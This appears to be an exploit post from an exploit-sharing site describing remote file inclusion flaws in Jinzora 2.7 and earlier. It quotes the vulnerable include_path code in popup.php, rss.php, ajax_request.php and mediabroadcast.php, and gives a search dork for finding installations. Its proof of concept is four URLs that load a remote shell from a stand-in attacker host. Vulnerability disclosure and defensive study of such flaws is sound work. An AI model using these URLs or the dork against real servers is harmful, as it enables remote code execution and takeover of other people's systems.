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Jinzora <= 2.7 (include_path) Multiple Remote File Include Vulnerabilities

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Jinzora <= 2.7 (include_path) Multiple Remote File Include Vulnerabilities

+ Jinzora <= 2.7 (include_path) Multiple Remote File Include Vulnerabilities
+ Vendor ............: http://www.jinzora.com/
+ Affected Software .: Jinzora <= 2.7
+ Description .......: "Jinzora enables you to stream your digital music and videos to any internet connected computer using a web browser"
+ Dork ..............: "Jinzora Media Jukebox"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Details:
+ Jinzora has several scripts which do not initialize variables before using them to include
+ files, assuming register_globals = on, we can initialize any one of the variables in a query
+ string and include a remote file of our choice.
+ Vulnerable Code:
+ popup.php, line(s) 01-27:
+ -> 01: <?php define('JZ_SECURE_ACCESS','true');
+ -> 27: include_once('jzBackend.php'); //jzBackend.php is being included before the include_path var is set
+ jzBackend.php, line(s) 40-77:
+ -> 01: <?php if (!defined(JZ_SECURE_ACCESS)) die ('Security breach detected.');
+ -> 40: @include($include_path."settings.php"); //assumes the include_path var has been set
+ -> 77: include($css);
+ rss.php, line(s) 01-35:
+ -> 01: <?php define('JZ_SECURE_ACCESS','true');
+ -> 35: include_once('backend/backend.php');
+ backend/backend.php, line(s) 02-42:
+ -> 02: if (!defined(JZ_SECURE_ACCESS)) die ('Security breach detected.');
+ -> 42: include_once($include_path. 'system.php'); //assumes the include_path var has been set
+ ajax_request.php, line(s) 01-32:
+ -> 01: <?php define('JZ_SECURE_ACCESS','true');
+ -> 32: require_once('jzBackend.php'); //see jzBackend.php above for vulnerable code
+ mediabroadcast.php, line(s) 01-42:
+ -> 01: <?php define('JZ_SECURE_ACCESS','true');
+ -> 42: include_once('backend/backend.php'); //see above for vulnerable code
+ Proof Of Concept:
+ http://[target]/[path]/popup.php?include_path=http://evilsite.com/shell.php?
+ http://[target]/[path]/rss.php?include_path=http://evilsite.com/shell.php?
+ http://[target]/[path]/ajax_request.php?include_path=http://evilsite.com/shell.php?
+ http://[target]/[path]/mediabroadcast.php?include_path=http://evilsite.com/shell.php?

#  0day.today [2024-10-06]  #